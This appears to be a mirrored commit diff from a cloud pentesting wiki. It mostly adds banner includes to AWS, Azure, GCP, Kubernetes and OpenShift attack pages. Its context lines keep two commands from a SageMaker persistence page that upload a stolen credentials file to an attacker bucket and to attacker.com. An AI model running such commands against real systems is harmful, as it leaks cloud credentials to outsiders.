mirror of
https://github.com/HackTricks-wiki/hacktricks-cloud.git
synced 2025-12-28 21:53:15 -08:00
Add content from: AnsibleHound – BloodHound Collector for Ansible WorX and Tow...
This commit is contained in:
HackTricks News Bot
@@ -1,5 +1,5 @@
|
||||
# AWS - Persistence
|
||||
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
||||
@@ -1,3 +1,6 @@
|
||||
# Aws Sagemaker Persistence
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
# AWS - SageMaker Lifecycle Configuration Persistence
|
||||
|
||||
@@ -157,3 +160,4 @@ aws s3 cp /tmp/creds.json $ATTACKER_BUCKET/$(hostname)-creds.json
|
||||
|
||||
curl -X POST -F "file=@/tmp/creds.json" http://attacker.com/upload
|
||||
```
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
@@ -1,5 +1,5 @@
|
||||
# AWS - Post Exploitation
|
||||
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
||||
@@ -35,3 +35,4 @@ However, a **bypass** has been identified where an attacker with sufficient perm
|
||||
**Summary:**
|
||||
|
||||
This vulnerability allows an attacker with sufficient AWS IAM permissions to recover previously detected secrets even after the original file has been deleted from S3. If an AWS secret key, access token, or other sensitive credential is exposed, an attacker could leverage this flaw to retrieve it and gain unauthorized access to AWS resources. This could lead to privilege escalation, unauthorized data access, or further compromise of cloud assets, resulting in data breaches and service disruptions.
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
@@ -1,8 +1,10 @@
|
||||
# AWS - Sagemaker Privesc
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
## AWS - Sagemaker Privesc
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
### `iam:PassRole` , `sagemaker:CreateNotebookInstance`, `sagemaker:CreatePresignedNotebookInstanceUrl`
|
||||
|
||||
@@ -114,4 +116,3 @@ _I haven't exploited because of the lack of time, but looks similar to the previ
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
||||
|
||||
@@ -1,5 +1,7 @@
|
||||
# AWS - WorkDocs Privesc
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
## WorkDocs
|
||||
|
||||
For more info about WorkDocs check:
|
||||
@@ -54,3 +56,4 @@ I didn't find any way to do this from the cli.
|
||||
|
||||
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
@@ -1,8 +1,10 @@
|
||||
# AWS - ECR Enum
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
## AWS - ECR Enum
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
### ECR
|
||||
|
||||
@@ -103,4 +105,3 @@ In the following page you can check how to **abuse ECR permissions to escalate p
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
@@ -1,5 +1,5 @@
|
||||
# AWS - Security & Detection Services
|
||||
|
||||
|
||||
{{#include ../../../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
||||
@@ -1,8 +1,10 @@
|
||||
# AWS - Inspector Enum
|
||||
|
||||
{{#include ../../../../banners/hacktricks-training.md}}
|
||||
|
||||
## AWS - Inspector Enum
|
||||
|
||||
{{#include ../../../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
### Inspector
|
||||
|
||||
@@ -387,4 +389,3 @@ aws inspector2 untag-resource --resource-arn <value> --tag-keys <value>
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
@@ -1,8 +1,10 @@
|
||||
# AWS - Trusted Advisor Enum
|
||||
|
||||
{{#include ../../../../banners/hacktricks-training.md}}
|
||||
|
||||
## AWS - Trusted Advisor Enum
|
||||
|
||||
{{#include ../../../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
## AWS Trusted Advisor Overview
|
||||
|
||||
@@ -72,4 +74,3 @@ AWS Trusted Advisor acts as a crucial tool in ensuring the optimization, perform
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
@@ -1,8 +1,10 @@
|
||||
# AWS - WAF Enum
|
||||
|
||||
{{#include ../../../../banners/hacktricks-training.md}}
|
||||
|
||||
## AWS - WAF Enum
|
||||
|
||||
{{#include ../../../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
## AWS WAF
|
||||
|
||||
@@ -472,4 +474,3 @@ aws wafv2 untag-resource --resource-arn <value> --tag-keys <value>
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
@@ -1,8 +1,10 @@
|
||||
# AWS - EventBridge Scheduler Enum
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
## EventBridge Scheduler
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
## EventBridge Scheduler
|
||||
|
||||
@@ -82,4 +84,3 @@ In the following page, you can check how to **abuse eventbridge scheduler permis
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
@@ -1,5 +1,5 @@
|
||||
# Az - Post Exploitation
|
||||
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
||||
@@ -19,3 +19,4 @@ For more information about function apps check:
|
||||
|
||||
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
@@ -1,5 +1,5 @@
|
||||
# Az - Privilege Escalation
|
||||
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
||||
@@ -1,7 +1,10 @@
|
||||
# Az Static Web Apps
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
# Az - Static Web Apps
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
## Static Web Apps Basic Information
|
||||
|
||||
@@ -202,4 +205,3 @@ All the information about privilege escalation and post exploitation in Azure St
|
||||
- [https://learn.microsoft.com/en-us/azure/app-service/overview-hosting-plans](https://learn.microsoft.com/en-us/azure/app-service/overview-hosting-plans)
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
@@ -1,5 +1,7 @@
|
||||
# GCP - Permissions for a Pentest
|
||||
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
If you want to pentest a GCP environment you need to ask for enough permissions to **check all or most of the services** used in **GCP**. Ideally, you should ask the client to create:
|
||||
|
||||
* **Create** a new **project**
|
||||
@@ -144,3 +146,4 @@ roles/bigquery.metadataViewer
|
||||
```
|
||||
|
||||
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
@@ -1,5 +1,5 @@
|
||||
# GCP - Persistence
|
||||
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
||||
@@ -1,5 +1,5 @@
|
||||
# GCP - Post Exploitation
|
||||
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
||||
@@ -128,3 +128,4 @@ def injection():
|
||||
|
||||
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
@@ -1,8 +1,10 @@
|
||||
# GCP - Add Custom SSH Metadata
|
||||
|
||||
{{#include ../../../../banners/hacktricks-training.md}}
|
||||
|
||||
## GCP - Add Custom SSH Metadata
|
||||
|
||||
{{#include ../../../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
### Modifying the metadata <a href="#modifying-the-metadata" id="modifying-the-metadata"></a>
|
||||
|
||||
@@ -100,4 +102,3 @@ It's possible to broaden the reach of SSH access to multiple Virtual Machines (V
|
||||
{{#include ../../../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
||||
|
||||
@@ -58,3 +58,4 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
|
||||
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
@@ -1,5 +1,5 @@
|
||||
# GCP - Services
|
||||
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
||||
@@ -1,8 +1,10 @@
|
||||
# IBM Cloud Pentesting
|
||||
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
## IBM Cloud Pentesting
|
||||
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
### What is IBM cloud? (By chatGPT)
|
||||
|
||||
@@ -38,4 +40,3 @@ https://book.hacktricks.wiki/en/pentesting-web/ssrf-server-side-request-forgery/
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
||||
|
||||
@@ -1,8 +1,10 @@
|
||||
# Kubernetes Basics
|
||||
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
## Kubernetes Basics
|
||||
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
**The original author of this page is** [**Jorge**](https://www.linkedin.com/in/jorge-belmonte-a924b616b/) **(read his original post** [**here**](https://sickrov.github.io)**)**
|
||||
|
||||
@@ -569,4 +571,3 @@ https://www.youtube.com/watch?v=X48VuDVv0do
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
||||
|
||||
@@ -1,5 +1,7 @@
|
||||
# External Secret Operator
|
||||
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
**The original author of this page is** [**Fares**](https://www.linkedin.com/in/fares-siala/)
|
||||
|
||||
This page gives some pointers onto how you can achieve to steal secrets from a misconfigured ESO or application which uses ESO to sync its secrets.
|
||||
@@ -119,3 +121,4 @@ https://github.com/external-secrets/external-secrets
|
||||
|
||||
|
||||
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
@@ -1,5 +1,7 @@
|
||||
# Kubernetes Kyverno
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
**The original author of this page is** [**Guillaume**](https://www.linkedin.com/in/guillaume-chapela-ab4b9a196)
|
||||
|
||||
## Definition
|
||||
@@ -57,3 +59,4 @@ When a pod is created in the `default` namespace without the label `app: myapp`,
|
||||
|
||||
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
@@ -1,5 +1,7 @@
|
||||
# Kubernetes Kyverno bypass
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
**The original author of this page is** [**Guillaume**](https://www.linkedin.com/in/guillaume-chapela-ab4b9a196)
|
||||
|
||||
|
||||
@@ -64,3 +66,4 @@ Another way to bypass policies is to focus on the ValidatingWebhookConfiguration
|
||||
|
||||
For more info check [https://madhuakula.com/kubernetes-goat/docs/scenarios/scenario-22/securing-kubernetes-clusters-using-kyverno-policy-engine/welcome/](https://madhuakula.com/kubernetes-goat/docs/scenarios/scenario-22/securing-kubernetes-clusters-using-kyverno-policy-engine/welcome/)
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
@@ -1,5 +1,7 @@
|
||||
# Kubernetes - OPA Gatekeeper
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
**The original author of this page is** [**Guillaume**](https://www.linkedin.com/in/guillaume-chapela-ab4b9a196)
|
||||
|
||||
## Definition
|
||||
@@ -77,3 +79,4 @@ When Gatekeeper is deployed in the Kubernetes cluster, it will enforce this poli
|
||||
|
||||
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
@@ -1,5 +1,7 @@
|
||||
# Kubernetes OPA Gatekeeper bypass
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
**The original author of this page is** [**Guillaume**](https://www.linkedin.com/in/guillaume-chapela-ab4b9a196)
|
||||
|
||||
## Abusing misconfiguration
|
||||
@@ -64,3 +66,4 @@ Another way to bypass constraints is to focus on the ValidatingWebhookConfigurat
|
||||
|
||||
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
@@ -1,5 +1,7 @@
|
||||
# Kubernetes ValidatingWebhookConfiguration
|
||||
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
**The original author of this page is** [**Guillaume**](https://www.linkedin.com/in/guillaume-chapela-ab4b9a196)
|
||||
|
||||
## Definition
|
||||
@@ -103,3 +105,4 @@ abusing-roles-clusterroles-in-kubernetes/
|
||||
|
||||
|
||||
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
@@ -1,5 +1,7 @@
|
||||
# OpenShift Pentesting
|
||||
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
## Basic Information
|
||||
|
||||
{{#ref}}
|
||||
@@ -20,3 +22,4 @@ openshift-privilege-escalation/
|
||||
|
||||
|
||||
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
@@ -1,5 +1,7 @@
|
||||
# OpenShift - Basic information
|
||||
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
## Kubernetes prior b**asic knowledge** <a href="#a94e" id="a94e"></a>
|
||||
|
||||
Before working with OpenShift, ensure you are comfortable with the Kubernetes environment. The entire OpenShift chapter assumes you have prior knowledge of Kubernetes.
|
||||
@@ -41,3 +43,4 @@ https://docs.openshift.com/container-platform/3.11/architecture/additional_conce
|
||||
|
||||
|
||||
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
@@ -1,5 +1,7 @@
|
||||
# OpenShift - Jenkins
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
**The original author of this page is** [**Fares**](https://www.linkedin.com/in/fares-siala/)
|
||||
|
||||
This page gives some pointers onto how you can attack a Jenkins instance running in an Openshift (or Kubernetes) cluster
|
||||
@@ -40,3 +42,4 @@ openshift-jenkins-build-overrides.md
|
||||
|
||||
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
@@ -1,5 +1,7 @@
|
||||
# Jenkins in Openshift - build pod overrides
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
**The original author of this page is** [**Fares**](https://www.linkedin.com/in/fares-siala/)
|
||||
|
||||
## Kubernetes plugin for Jenkins
|
||||
@@ -275,3 +277,4 @@ pipeline {
|
||||
|
||||
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
@@ -1,5 +1,7 @@
|
||||
# OpenShift - Privilege Escalation
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
## Missing Service Account
|
||||
|
||||
{{#ref}}
|
||||
@@ -20,3 +22,4 @@ openshift-scc-bypass.md
|
||||
|
||||
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
@@ -1,5 +1,7 @@
|
||||
# OpenShift - Missing Service Account
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
## Missing Service Account
|
||||
|
||||
It happens that cluster is deployed with preconfigured template automatically setting Roles, RoleBindings and even SCC to service account that is not yet created. This can lead to privilege escalation in the case where you can create them. In this case, you would be able to get the token of the SA newly created and the role or SCC associated. Same case happens when the missing SA is part of a missing project, in this case if you can create the project and then the SA you get the Roles and SCC associated.
|
||||
@@ -24,3 +26,4 @@ https://github.com/maxDcb/OpenShiftGrapher
|
||||
|
||||
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
@@ -1,5 +1,7 @@
|
||||
# Openshift - SCC bypass
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
**The original author of this page is** [**Guillaume**](https://www.linkedin.com/in/guillaume-chapela-ab4b9a196)
|
||||
|
||||
## Privileged Namespaces
|
||||
@@ -139,3 +141,4 @@ To bypass GateKeeper's rules and set this label to execute a cluster takeover, *
|
||||
|
||||
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
@@ -1,5 +1,7 @@
|
||||
# OpenShift - Tekton
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
**The original author of this page is** [**Haroun**](https://www.linkedin.com/in/haroun-al-mounayar-571830211)
|
||||
|
||||
### What is tekton
|
||||
@@ -76,3 +78,4 @@ spec:
|
||||
|
||||
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
@@ -1,5 +1,7 @@
|
||||
# Openshift - SCC
|
||||
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
**The original author of this page is** [**Guillaume**](https://www.linkedin.com/in/guillaume-chapela-ab4b9a196)
|
||||
|
||||
## Definition
|
||||
@@ -69,3 +71,4 @@ openshift-privilege-escalation/openshift-scc-bypass.md
|
||||
|
||||
|
||||
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
Reference in New Issue
Block a user